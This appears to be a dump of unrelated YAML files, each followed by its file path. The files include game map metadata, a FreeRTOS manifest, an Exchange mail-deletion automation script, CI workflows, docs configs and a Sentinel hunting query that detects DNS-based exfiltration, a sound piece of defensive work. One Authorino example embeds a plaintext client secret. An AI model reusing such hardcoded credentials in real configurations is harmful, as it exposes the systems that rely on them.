Skaarj Tech: 0.1
bots: true
|
content/Unreal Tournament/Maps/Multi-Team CTF/D/8/1/3dee3d/ctf4-diamondsword_[813dee3d].yml
|
name : "FreeRTOS STM32U5 Reference Integration"
version: "202205.00"
description: |-
"Reference IoT integration project using the STMicroelectronics STM32U585 and FreeRTOS LTS libraries"
dependencies:
- name: "FreeRTOS-Kernel"
version: "V10.4.3"
repository:
type: "git"
url: "https://github.com/FreeRTOS/FreeRTOS-Kernel.git"
path: "Middleware/FreeRTOS/kernel"
- name: "coreJSON"
version: "v3.0.0"
repository:
type: "git"
url: "https://github.com/FreeRTOS/coreJSON.git"
path: "Middleware/FreeRTOS/coreJSON"
- name: "coreHTTP"
version: "v2.0.0"
repository:
type: "git"
url: "https://github.com/FreeRTOS/coreHTTP.git"
path: "Middleware/FreeRTOS/coreHTTP"
- name: "coreMQTT"
version: "v1.2.0"
repository:
type: "git"
url: "https://github.com/FreeRTOS/coreMQTT.git"
path: "Middleware/FreeRTOS/coreMQTT"
- name: "coreMQTT-Agent"
version: "v1.1.0"
repository:
type: "git"
url: "https://github.com/FreeRTOS/coreMQTT-Agent.git"
path: "Middleware/FreeRTOS/coreMQTT-Agent"
- name: "corePKCS11"
version: "1cc1579"
repository:
type: "git"
url: "https://github.com/FreeRTOS/corePKCS11.git"
path: "Middleware/FreeRTOS/corePKCS11"
- name: "device-shadow"
version: "v1.0.2"
repository:
type: "git"
url: "https://github.com/aws/Device-Shadow-for-AWS-IoT-embedded-sdk.git"
path: "Middleware/AWS/IoTDeviceShadow"
- name: "backoffAlgorithm"
version: "v1.0.0"
repository:
type: "git"
url: "https://github.com/FreeRTOS/backoffAlgorithm.git"
path: "Middleware/FreeRTOS/backoffAlgorithm"
- name: "device-defender"
version: "v1.1.0"
repository:
type: "git"
url: "https://github.com/aws/Device-Defender-for-AWS-IoT-embedded-sdk.git"
path: "Middleware/AWS/IoTDeviceDefender"
- name: "ota"
version: "v3.3.0"
repository:
type: "git"
url: "https://github.com/aws/ota-for-AWS-IoT-embedded-sdk.git"
path: "Middleware/AWS/OTA"
- name: "jobs"
version: "v1.1.0"
repository:
type: "git"
url: "https://github.com/aws/Jobs-for-AWS-IoT-embedded-sdk.git"
path: "Middleware/AWS/IoTJobs"
- name: "device-shadow"
version: "v1.0.2"
repository:
type: "git"
url: "https://github.com/aws/Device-Shadow-for-AWS-IoT-embedded-sdk.git"
path: "Middleware/AWS/IoTDeviceShadow"
- name: "lwip"
version: "STABLE-2_1_2_RELEASE"
repository:
type: "git"
url: "https://github.com/lwip-tcpip/lwip.git"
path: "Middleware/lwip"
- name: "mbedtls"
version: "v3.1.0"
repository:
type: "git"
url: "https://github.com/Mbed-TLS/mbedtls.git"
path: "Middleware/ARM/mbedtls"
- name: "mcuboot"
version: "v1.9.0"
repository:
type: "git"
url: "https://github.com/mcu-tools/mcuboot.git"
path: "Middleware/ARM/mcuboot"
- name: "trusted-firmware-m"
version: "30aa9756"
repository:
type: "git"
url: "https://github.com/paulbartell/tfm-staging.git"
path: "Middleware/ARM/trusted-firmware-m"
- name: "tinycbor"
version: "v0.6.0"
repository:
type: "git"
url: "https://github.com/intel/tinycbor.git"
path: "Middleware/tinycbor"
- name: "littlefs"
version: "v2.4.1"
repository:
type: "git"
url: "https://github.com/littlefs-project/littlefs.git"
path: "Middleware/ARM/littlefs"
- name: "ota-pal-psa"
version: "20fcfd1"
repository:
type: "git"
url: "https://github.com/ravibhagavandas/freertos-ota-pal-psa.git"
path: "Middleware/ARM/ota-pal-psa"
- name: "stm32u5_hal"
version: "v1.1.0"
repository:
type: "git"
url: "https://github.com/STMicroelectronics/stm32u5xx_hal_driver.git"
path: "Drivers/STM32U5xx_HAL"
- name: "cmsis_device_u5"
version: "v1.1.0"
repository:
type: "git"
url: "https://github.com/STMicroelectronics/cmsis_device_u5.git"
path: "Drivers/CMSIS/Device/ST/STM32U5xx"
- name: "http-parser"
version: "ec8b5ee"
repository:
type: "git"
url: "https://github.com/nodejs/http-parser.git"
path: "Middleware/http-parser"
|
manifest.yml
|
commonfields:
id: ExchangeDeleteIDsFromContext
version: -1
name: ExchangeDeleteIDsFromContext
script: >-
import json
resultText = ''
resultErr = []
res = []
found = demisto.get(demisto.context(), 'ExchangeItemIDs')
if found and not found == '{}':
mbIds = json.loads(found)
for mb in mbIds.keys():
resultText += '**Deleting from {0}:**\n'.format(str(mb))
itemids = ','.join(mbIds[mb])
delres = demisto.executeCommand('ews-delete-items', {'target-mailbox': mb, 'item-ids' :itemids })
if isError(delres[0]):
resultErr += delres
else:
delres = delres[0]
if delres['Type'] != 4 and delres['ContentsFormat'] == 'json':
delresp = demisto.get(delres, 'Contents.Envelope.Body.DeleteItemResponse.ResponseMessages.DeleteItemResponseMessage')
if delresp:
delresp = delresp if isinstance(delresp, list) else [delresp]
if delresp[0]['-ResponseClass'] == 'Success':
resultText += 'Delete successful.\n'
else:
resultText += "Delete failed: " + delresp['MessageText'] + "\nResponse Code:" + delresp['-ResponseCode']+'\n'
else:
resultText += "Delete failed with missing response\n"
else:
resultErr += [delres]
res += [ { 'Type' : entryTypes['note'], 'ContentsFormat' : formats['markdown'], 'Contents': resultText } ]
res += resultErr
demisto.setContext('ExchangeItemIDs', '')
demisto.results(res)
else:
demisto.results( { 'Type' : entryTypes['error'], 'ContentsFormat' : formats['text'], 'Contents' : 'No mail ids were found in context. Cannot continue.' } )
type: python
subtype: python2
tags:
- ews
- exchange
comment: Deprecated. Delete Mails with ID's under the context key "ExchangeItemIDs"
system: true
scripttarget: 0
args: []
dependson:
must:
- ews-delete-items
timeout: 0s
deprecated: true
fromversion: 5.0.0
|
Packs/DeprecatedContent/Scripts/script-ExchangeDeleteIDsFromContext.yml
|
apiVersion: config.authorino.3scale.net/v1beta1
kind: Service
metadata:
name: talker-api-protection
spec:
hosts:
- talker-api
identity:
- name: keycloak
oidc:
endpoint: http://keycloak:8080/auth/realms/kuadrant
metadata:
- name: user-info
userInfo:
identitySource: keycloak
- name: resource-data
uma:
endpoint: http://keycloak:8080/auth/realms/kuadrant
credentialsRef:
name: talker-api-uma-credentials
authorization:
- name: main-abac-policy
opa:
inlineRego: |
http_request = input.context.request.http
http_method = http_request.method
requested_path = trim_right(http_request.path, "/")
identity = input.auth.identity
resource_data = object.get(input.auth.metadata, "resource-data", [])[0]
allow {
http_method == "GET"
requested_path == "/hello"
}
allow {
http_method == "GET"
requested_path == "/goodbye"
identity_is_admin
}
allow {
path_sections := split(trim_left(requested_path, "/"), "/")
some greetingid
http_method == "GET"
path_sections = ["greetings", greetingid]
identity_owns_the_resource
}
identity_owns_the_resource {
resource_owner := object.get(object.get(resource_data, "owner", {}), "id", "")
subject := object.get(identity, "sub", object.get(identity, "username", ""))
resource_owner == subject
}
identity_is_admin {
identity.realm_access.roles[_] == "admin"
}
- name: some-extra-rules
json:
rules:
- selector: "auth.identity.email_verified"
operator: eq
value: "true"
- selector: context.request.http.headers.x-forwarded-for
operator: matches
value: "10\\.244\\.0\\.\\d+"
---
apiVersion: v1
kind: Secret
metadata:
name: talker-api-uma-credentials
stringData:
clientID: talker-api
clientSecret: 523b92b6-625d-4e1e-a313-77e7a8ae4e88
type: Opaque
|
examples/keycloak-abac.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-16 19:29"
game: "Unreal Tournament"
name: "DM-Ozealoth"
author: "<NAME>) Dessureault"
description: "None"
releaseDate: "2005-04"
attachments:
- type: "IMAGE"
name: "DM-Ozealoth_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/O/DM-Ozealoth_shot_1.png"
- type: "IMAGE"
name: "DM-Ozealoth_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/O/DM-Ozealoth_shot_3.png"
- type: "IMAGE"
name: "DM-Ozealoth_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/O/DM-Ozealoth_shot_2.png"
- type: "IMAGE"
name: "DM-Ozealoth_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/O/DM-Ozealoth_shot_4.png"
originalFilename: "dm-ozealoth.zip"
hash: "7876ac9e52534c89420bab1ac7e9cae26eb2fcbe"
fileSize: 1871607
files:
- name: "DM-Ozealoth.unr"
fileSize: 3133029
hash: "b8891c67d3a109d82105d6325f1aa366495d9e41"
otherFiles: 4
dependencies: {}
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/DeathMatch/O/dm-ozealoth.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/DeathMatch/MapsO/&file=dm-ozealoth.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/DeathMatch&file=dm-ozealoth.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/DeathMatch/MapsO/dm-ozealoth.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/DeathMatch/O/7/8/76ac9e/dm-ozealoth.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/DeathMatch/O/7/8/76ac9e/dm-ozealoth.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "DeathMatch"
title: "Ozealoth"
playerCount: "2-4"
themes:
Ancient: 0.1
Natural: 0.7
Skaarj Tech: 0.2
bots: true
|
content/Unreal Tournament/Maps/DeathMatch/O/7/8/76ac9e/dm-ozealoth_[7876ac9e].yml
|
id: 81b478a7-46e2-4f7f-a1aa-aba5e541232b
name: DNS Full Name anomalous lookup increase
description: |
'Checking for a threefold increase or more of Full Name lookup per Client IP for the current day for today vs the daily average for the previous week.
This can potentially identify excessive traffic to a given location that could be indicative of data transfer out of your network.
This is only Name lookups, so it would be recommended to review the Firewall\Webproxy logs in relation to the ClientIP making the interesting requests.'
requiredDataConnectors:
- connectorId: DNS
dataTypes:
- DnsEvents
tactics:
- CommandAndControl
- Exfiltration
relevantTechniques:
- T1568
- T1008
- T1048
query: |
let starttime = todatetime('{{StartTimeISO}}');
let endtime = todatetime('{{EndTimeISO}}');
let lookback = starttime - 7d;
//example of excluding Saturday and Sunday in Average as those are potentially low volume and decrease the average, feel free to change
let excludedDays = dynamic(["Saturday", "Sunday"]);
// average is across 5 days as we are dropping weekends, change as needed
let numDays = 5;
// limit to over 1000 lookups somewhat random but helps focus in on higher lookups, change as needed
let avglookupThreshold = 3;
let lookupThreshold = 1000;
DnsEvents
//Setting to startofday so we get 7 days prior to today
| where TimeGenerated >= startofday(lookback) and TimeGenerated <= startofday(starttime)
| where SubType =~ "LookupQuery"
//getting the associated number of the day of the week so we can map to a given day for later parsing if needed
| extend DayNumberofWeek = tostring(dayofweek(TimeGenerated))
//Setting the Day of the week value so that certain days could be excluded if needed
| extend DayofWeek = iff(DayNumberofWeek == "00:00:00", "Sunday",
(iff(DayNumberofWeek == "1.00:00:00", "Monday",
(iff(DayNumberofWeek == "2.00:00:00", "Tuesday",
(iff(DayNumberofWeek == "3.00:00:00", "Wednesday",
(iff(DayNumberofWeek == "4.00:00:00", "Thursday",
(iff(DayNumberofWeek == "5.00:00:00", "Friday",
(iff(DayNumberofWeek == "6.00:00:00", "Saturday", DayNumberofWeek)))))))))))))
| where DayofWeek !in~ (excludedDays)
| summarize StartTimeUtc = min(TimeGenerated), EndTimeUtc = max(TimeGenerated), count() by ClientIP, Name, IPAddresses
| project StartTimeUtc, EndTimeUtc, ClientIP, FullNameLookup = Name, IPAddresses, DailyAvgLookupCountOverLastWeek = count_/numDays
| join ( DnsEvents
| where TimeGenerated between(startofday(starttime)..endofday(endtime))
| where SubType =~ "LookupQuery"
| summarize count() by ClientIP, FullNameLookup = Name, IPAddresses
| project ClientIP, LookupCountToday = count_, FullNameLookup, IPAddresses
)
on ClientIP, FullNameLookup, IPAddresses
| where LookupCountToday > (DailyAvgLookupCountOverLastWeek * avglookupThreshold) and LookupCountToday >= lookupThreshold
| project StartTimeUtc, EndTimeUtc, ClientIP, LookupCountToday, DailyAvgLookupCountOverLastWeek, FullNameLookup, IPAddresses
| order by LookupCountToday desc nulls last
| extend timestamp = StartTimeUtc, IPCustomEntity = ClientIP
|
Hunting Queries/DnsEvents/DNS_FullNameAnomalousLookupIncrease.yaml
|
name: Release fosslight_binary
on:
release:
types: [published]
jobs:
update-changelog:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Get Release
uses: agners/get-draft-release@v1.2.2
id: get_release
env:
GITHUB_TOKEN: ${{ github.token }}
- name: Bump up version
env:
NEW_TAG: ${{ steps.get_release.outputs.tag_name }}
run: |
pip install --upgrade bumpversion
LAST_TWO_TAGS=$(git for-each-ref refs/tags/ --count=2 --sort=-v:refname --format="%(refname:short)")
LAST_ONE=$(echo $LAST_TWO_TAGS | cut -d' ' -f 2)
last_version=$(echo ${LAST_ONE//v/""})
echo Last version: ${last_version}
new_version=$(echo ${NEW_TAG//v/""})
echo New version: ${new_version}
git config --local user.name "github-actions[bot]"
bumpversion --current-version $last_version --new-version $new_version setup.py
- name: update changelog with gren
env:
GREN_GITHUB_TOKEN: ${{ secrets.TOKEN }}
run: |
npm install github-release-notes@0.17.3
node_modules/.bin/gren changelog --override
- name: Commit files
run: |
git config --local user.name "github-actions[bot]"
git add CHANGELOG.md
git commit -m "Update ChangeLog"
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.TOKEN }}
branch: main
build:
name: Build packages
needs: update-changelog
runs-on: ${{ matrix.os }}
strategy:
matrix:
include:
- os: ubuntu-18.04
TARGET: ubuntu
CMD_BUILD: >
pyinstaller --onefile cli.py -n cli --additional-hooks-dir=hooks &&
mv dist/cli fosslight_bin_ubuntu18
OUT_FILE_NAME: fosslight_bin_ubuntu18
ASSET_MIME: application/octet-stream
- os: macos-latest
TARGET: macos
CMD_BUILD: >
pyinstaller --onefile cli.py -n cli --additional-hooks-dir=hooks &&
mv dist/cli fosslight_bin_macos
OUT_FILE_NAME: fosslight_bin_macos
ASSET_MIME: aapplication/x-mach-binary
- os: windows-latest
TARGET: windows
CMD_BUILD: >
pyinstaller --onefile cli.py -n cli --additional-hooks-dir=hooks &&
move dist/cli.exe fosslight_bin_windows.exe
OUT_FILE_NAME: fosslight_bin_windows.exe
ASSET_MIME: application/vnd.microsoft.portable-executable
steps:
- uses: actions/checkout@v2
with:
ref: main
- name: Set up Python 3.6
uses: actions/setup-python@v2
with:
python-version: 3.6
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install .
pip install pyinstaller
- name: Build with pyinstaller for ${{matrix.TARGET}}
run: ${{matrix.CMD_BUILD}}
- name: Upload Release Asset
id: upload-release-asset
uses: actions/upload-release-asset@v1.0.1
env:
GITHUB_TOKEN: ${{ secrets.TOKEN }}
with:
upload_url: ${{ github.event.release.upload_url }}
asset_path: ./${{ matrix.OUT_FILE_NAME}}
asset_name: ${{ matrix.OUT_FILE_NAME}}
asset_content_type: ${{ matrix.ASSET_MIME}}
deploy:
runs-on: ubuntu-18.04
needs: build
steps:
- uses: actions/checkout@v2
with:
ref: main
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: '3.7'
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install setuptools wheel twine
- name: Build and publish
env:
TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
run: |
python setup.py sdist bdist_wheel
twine upload dist/*
- name: Upload Release 3rd Party License text
id: upload-release-license
uses: actions/upload-release-asset@v1.0.1
env:
GITHUB_TOKEN: ${{ secrets.TOKEN }}
with:
upload_url: ${{ github.event.release.upload_url }}
asset_path: ./LICENSES/LicenseRef-3rd_party_licenses.txt
asset_name: LicenseRef-3rd_party_licenses.txt
asset_content_type: text/plain
|
.github/workflows/publish-release.yml
|
items:
- uid: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle"
id: "WithTitle"
parent: "com.microsoft.azure.management.apimanagement.v2019_01_01"
children:
- "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle(java.lang.String)"
langs:
- "java"
name: "EmailTemplateContract.DefinitionStages.WithTitle"
nameWithType: "EmailTemplateContract.DefinitionStages.WithTitle"
fullName: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle"
type: "Interface"
package: "com.microsoft.azure.management.apimanagement.v2019_01_01"
summary: "The stage of the emailtemplatecontract definition allowing to specify Title."
syntax:
content: "public static interface EmailTemplateContract.DefinitionStages.WithTitle"
- uid: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle(java.lang.String)"
id: "withTitle(java.lang.String)"
parent: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle"
langs:
- "java"
name: "withTitle(String title)"
nameWithType: "EmailTemplateContract.DefinitionStages.WithTitle.withTitle(String title)"
fullName: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle(String title)"
overload: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle*"
type: "Method"
package: "com.microsoft.azure.management.apimanagement.v2019_01_01"
summary: "Specifies title."
syntax:
content: "public abstract EmailTemplateContract.DefinitionStages.WithCreate withTitle(String title)"
parameters:
- id: "title"
type: "java.lang.String"
description: "Title of the Template"
return:
type: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithCreate"
description: "the next definition stage"
references:
- uid: "java.lang.String"
spec.java:
- uid: "java.lang.String"
name: "String"
fullName: "java.lang.String"
- uid: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithCreate"
name: "EmailTemplateContract.DefinitionStages.WithCreate"
nameWithType: "EmailTemplateContract.DefinitionStages.WithCreate"
fullName: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithCreate"
- uid: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle*"
name: "withTitle"
nameWithType: "EmailTemplateContract.DefinitionStages.WithTitle.withTitle"
fullName: "com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.withTitle"
package: "com.microsoft.azure.management.apimanagement.v2019_01_01"
|
docs-ref-autogen/com.microsoft.azure.management.apimanagement.v2019_01_01.EmailTemplateContract.DefinitionStages.WithTitle.yml
|
---
- block:
- name: 1-0102-01_create_user_and_groups - check apache user's primary group
shell: grep -e "^{{ apac_apache.exec_groups.primary.name }}:" /etc/group
failed_when: false
changed_when: false
register: check_primary_group
when: apac_apache | has_nested_keys("exec_groups", "primary", "name") is defined
- name: 1-0102-01_create_user_and_groups - create apache user's primary group
group:
name: "{{ apac_apache.exec_groups.primary.name }}"
gid: "{{ apac_apache.exec_groups.primary.gid | default(omit) }}"
when:
- not ( check_primary_group | skipped )
- check_primary_group.rc != 0
- name: 1-0102-01_create_user_and_groups - check apache user's secondary groups
shell: grep -e "^{{ item.name }}:" /etc/group
failed_when: false
changed_when: false
register: check_secondary_groups
with_items:
"{{ apac_apache.exec_groups.secondary | default('') }}"
when: item.name is defined
- name: 1-0102-01_create_user_and_groups - create apache user's secondary group
group:
name: "{{ item.item.name }}"
gid: "{{ item.item.gid | default(omit) }}"
with_items:
"{{ check_secondary_groups.results }}"
when:
- not ( check_secondary_groups | skipped )
- item.rc != 0
- name: 1-0102-01_create_user_and_groups - check apache user
shell: id {{ apac_apache.exec_user.name }}
failed_when: false
changed_when: false
register: check_apache_user
- name: 1-0102-01_create_user_and_groups - set strings of secondary groups
set_fact:
sub_groups_str:
"{{ apac_apache.exec_groups.secondary | map(attribute='name') | join(',') }}"
when: apac_apache | has_nested_keys("exec_groups", "secondary")
- name: 1-0102-01_create_user_and_groups - create apache user
user:
name: "{{ apac_apache.exec_user.name }}"
uid: "{{ apac_apache.exec_user.uid | default('48') }}"
group: "{{ apac_apache.exec_groups.primary.name | default(omit) }}"
groups: "{{ sub_groups_str | default(omit) }}"
home: "{{ apac_apache.exec_user.home_dir | default('/var/www') }}"
shell: "{{ apac_apache.exec_user.shell | default('/sbin/nologin') }}"
password: "{{ apac_apache.exec_user.password | password_hash('<PASSWORD>') }}"
state: present
when:
- check_apache_user.rc != 0
when: apac_apache | has_nested_keys("exec_user", "name")
|
Ansible/roles/1-0102_apache/tasks/1-0102-01_create_user_and_groups.yml
|
branches:
only:
- master
- /^releases\/.*/
language: python
python:
- 2.7
- 3.5
- 3.6
compiler:
- g++
matrix:
# cf. https://blog.travis-ci.com/2019-08-07-extensive-python-testing-on-travis-ci
include:
# Add 3.7 build by hand. This is the officially supported method for now.
- python: 3.7
dist: xenial
name: "Python: 3.7"
# Note: All the rest are technically allowed to fail. This is mostly so the
# Travis runs can finish faster, since they often only do 4 at a time.
# But we should periodically check them and try to make sure they all work.
# Add a linux build with clang
- python: 3.6
env:
- COMPILER=clang
- CC=clang
- CXX=clang++
- LD_LIBRARY_PATH=/usr/local/clang/lib:$LD_LIBRARY_PATH
name: Linux clang (Python 3.6)
# Add a few macos builds
# Here, the python version is set by the xcode version.
- os: osx
osx_image: xcode9.3 # Has python 2.7.14_2
language: shell # language: python is an error on macos
env:
- TRAVIS_PYTHON_VERSION=2.7
# Note: Use --user to supersede existing versions rather than sudo pip -U ...
# since existing versions of some packages (e.g. numpy) live in /System/
# directory where delete operations are forbidden.
- __USER=--user
- PATH=/Users/travis/Library/Python/2.7/bin:$PATH
name: OSX (Python 2.7)
- os: osx
osx_image: xcode9.4 # Has python 3.6.5
language: shell
env:
- TRAVIS_PYTHON_VERSION=3.6
name: OSX (Python 3.6)
- os: osx
osx_image: xcode11 # Has python 3.7.4
language: shell
env:
- TRAVIS_PYTHON_VERSION=3.7
name: OSX (Python 3.7)
# Check 3.8-dev, but less concerned if this fails.
- python: 3.8-dev
dist: xenial
name: "Python: 3.8-dev"
# For grins, add pypy.
- python: pypy3
name: PyPy
allow_failures:
- name: Linux clang (Python 3.6)
- os: osx
- python: 3.8-dev
- python: pypy3
fast_finish: true
before_install:
- if [[ $TRAVIS_OS_NAME == "linux" ]]; then sudo -H apt-get -qq update; sudo -H apt-get install -y libffi-dev openmpi-bin libopenmpi-dev; fi
- if [[ $TRAVIS_OS_NAME == "osx" ]]; then brew update; brew install libffi openmpi || true; fi
# On OSX, need to use pip3, not pip and python3, not python
- if [[ $TRAVIS_OS_NAME == "osx" && $TRAVIS_PYTHON_VERSION > 3.0 ]]; then export PIP=pip3; export PYTHON=python3; else export PIP=pip; export PYTHON=python; fi
- $PIP --version
- $PYTHON --version
install:
# Update pip executable. (Needs sudo on some systems.)
- sudo -H $PIP install -U pip
# Install dependencies
- $PIP install -U $__USER numpy # Do this first to clarify potential conflicts
- $PIP install -U $__USER -r requirements.txt
# Extra packages only needed for testing:
# fitsio is technically optional, but better to do those tests on all systems.
- $PIP install -U $__USER codecov fitsio mpi4py
# Pin some versions for py2.7
- if [[ $TRAVIS_PYTHON_VERSION < 3.0 ]]; then $PIP install -U $__USER pytest==3.2 pytest-cov==2.4; fi
- if [[ $TRAVIS_PYTHON_VERSION > 3.0 ]]; then $PIP install -U $__USER pytest pytest-cov; fi
# Only add optional ones for py3.7
# They are slow to install, especially 3.8 and pypy, where installed from scratch.
- if [[ $TRAVIS_PYTHON_VERSION == 3.7 ]]; then $PIP install -U $__USER matplotlib nbval ipykernel scipy pandas guppy3 h5py; fi
# halotools doesn't work anymore in 3.x (because of astropy change), so do this in 2.7.
- if [[ $TRAVIS_PYTHON_VERSION == 2.7 ]]; then $PIP install -U $__USER h5py halotools; fi
- $PIP list
script:
- $PYTHON setup.py install $__USER
- cd tests
- pytest --cov=treecorr test*.py
# Don't do coverage for mpi tests. Those are included in the main tests with mock_mpi.
# These just check that the code works when run in a real mpi session.
- if [[ $TRAVIS_PYTHON_VERSION > 3.0 ]]; then mpiexec -n 2 $PYTHON -u mpi_test.py; fi
- if [[ $TRAVIS_PYTHON_VERSION > 3.0 ]]; then mpiexec -n 1 $PYTHON -u mpi_test.py; fi
- if [[ $TRAVIS_PYTHON_VERSION == 3.7 ]]; then pytest --nbval Tutorial.ipynb --sanitize-with sanitize.cfg --current-env; fi
after_success:
- codecov
cache:
ccache: true
pip: true
directories:
- $HOME/Library/Caches/Homebrew
before_cache:
- rm -rfv $HOME/.cache/pip/log
- rm -rfv $HOME/.cache/pip/http
- if [[ $TRAVIS_OS_NAME == "osx" ]]; then brew cleanup; fi
|
.travis.yml
|
# Project information
site_name: 'Status Style Guide'
site_url: https://status.im/help/style-guide/
site_author: 'Status Research & Development GmbH'
site_description: 'Status style guide'
# Project directories
docs_dir: '../../docs/style-guide/'
site_dir: '../../generated/style-guide/'
# Repository
repo_name: 'Status Help'
repo_url: https://github.com/status-im/help.status.im
edit_uri: edit/develop/docs/style-guide
# Copyright
copyright: 'Status Research & Development GmbH'
# Theme configuration
theme:
name: material
custom_dir: '../../overrides/'
logo: assets/images/status-logo-320x320.png
favicon: assets/images/status-logo-32x32.png # Status favicon
language: en
palette:
- media: "(prefers-color-scheme: light)"
scheme: default
primary: deep purple
accent: light blue
toggle:
icon: material/weather-night
name: Switch to dark mode
- media: "(prefers-color-scheme: dark)"
scheme: slate
primary: deep orange
accent: blue
toggle:
icon: material/weather-sunny
name: Switch to light mode
font:
text: Inter
code: Roboto Mono
icon:
repo: fontawesome/brands/github
# Custom admonitions (callouts) require "Insiders" subscription
admonition:
# note: fontawesome/solid/sticky-note
# abstract: fontawesome/solid/book
info: fontawesome/solid/info-circle
tip: fontawesome/solid/bullhorn
# success: fontawesome/solid/check
# question: fontawesome/solid/question-circle
warning: fontawesome/solid/exclamation-triangle
# failure: fontawesome/solid/bomb
# danger: fontawesome/solid/skull
# bug: fontawesome/solid/robot
# example: fontawesome/solid/flask
# quote: fontawesome/solid/quote-left
# Material for MkDocs features
features:
- search.suggest
- search.highlight
- navigation.instant
- navigation.tabs
- navigation.tabs.sticky
- navigation.indexes
- navigation.top
# Extensions
markdown_extensions:
- meta
- admonition
- tables
- pymdownx.details
- pymdownx.keys
- pymdownx.smartsymbols
- pymdownx.superfences
- pymdownx.tabbed:
alternate_style: true
- abbr
- pymdownx.snippets
- pymdownx.emoji:
emoji_index: !!python/name:materialx.emoji.twemoji
emoji_generator: !!python/name:materialx.emoji.to_svg
options:
custom_icons:
- overrides/.icons
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- attr_list
- toc:
toc_depth: 3
# Theme customization
extra_css:
- assets/stylesheets/extra.css
# Transaltions (intentionally disabled)
extra:
# alternate:
# # Switch to English
# - name: English
# link: https://status.im/help/en/
# lang: en
#
# # Switch to Spanish
# - name: Spanish
# link: https://status.im/help/es/
# lang: es
# Footer icons and links
social:
- icon: fontawesome/brands/twitter
link: https://twitter.com/ethstatus
name: Status on Twitter
- icon: material/web
link: https://status.im
name: Status website
- icon: material/chat
link: https://join.status.im/chat/public/status
# Plugins
plugins:
- search:
lang: en
- git-revision-date
- git-revision-date-localized:
type: date
fallback_to_build_date: true
# Page tree (for mobile view)
nav:
- Welcome: index.md
- Style guidelines: style-guidelines.md
- Structuring the content: structuring-the-content.md
- Style conventions: style-conventions.md
|
config/style-guide/mkdocs.yml
|
l_german:
#### FIX OFFICIAL TRAD ###
#### Reload localisation console cmd: reloadloc
## COUNTRY NAME ##
#c Toulouse -> Occitanie
TOU:0 "Okzitanien"
TOU_ADJ:0 "Okzitanisch"
## TEXT COLOR ##
# Attitude #
attitude_unknown:0 "§gUnbekannt§!"
attitude_human:0 "§YOffen§!"
attitude_hostile:0 "§RFeindlich§!"
attitude_rivalry:0 "§RRivalität§!"
attitude_outraged:0 "§RAufgebracht§!"
attitude_friendly:0 "§GFreundlich§!"
attitude_protective:0 "§TBeschützend§!"
attitude_overlord:0 "§OHerrscher§!"
attitude_loyal:0 "§GLoyal§!"
attitude_disloyal:0 "§YIlloyal§!"
attitude_rebellious:0 "§RRebellisch§!"
attitude_domineering:0 "§RTyrannisch§!"
attitude_threatened:0 "§YBedroht§!"
attitude_neutral:0 "Neutral"
attitude_defensive:0 "§TDefensiver Verbündeter§!"
attitude_allied:0 "§BVerbündeter§!"
WANTS_NEUTRAL:0 "Neutral"
WANTS_ALLY:0 "§GFreundlich§!"
WANTS_ENEMY:0 "§RFeindselig§!"
IS_THREAT:0 "§YBedroht§!"
# Independency #
INDEPENDANT:0 "§GUnabhängige Nation§!"
SUBJECT_OF:0 "§Y$SUBJECTTYPE$ von $LORD$§!"
INTERREGNUM:0 "§Y(Interregnum)§!"
# Religion School #
SCHOOL_HATE:0 "§RHass§!"
SCHOOL_AMBIVALENT:0 "§OGespalten§!"
SCHOOL_LIKE:0 "§TRespektiert§!"
## FRONTEND ##
PLAY:0 "Start"
MATCHMAKING_SERVER_STATUS_STARTING:0 "§GStartet§!"
MATCHMAKING_SERVER_STATUS_RUNNING:0 "§YLäuft§!"
MATCHMAKING_SERVER_STATUS_STOPPED:0 "§RGestoppt§!"
TRANSFER_SAVEGAME:0 "Übertragung ( $NAME|Y%$ )"
LOADING_SAVEGAME:0 "Spielstand ( $NAME|Y%$ )"
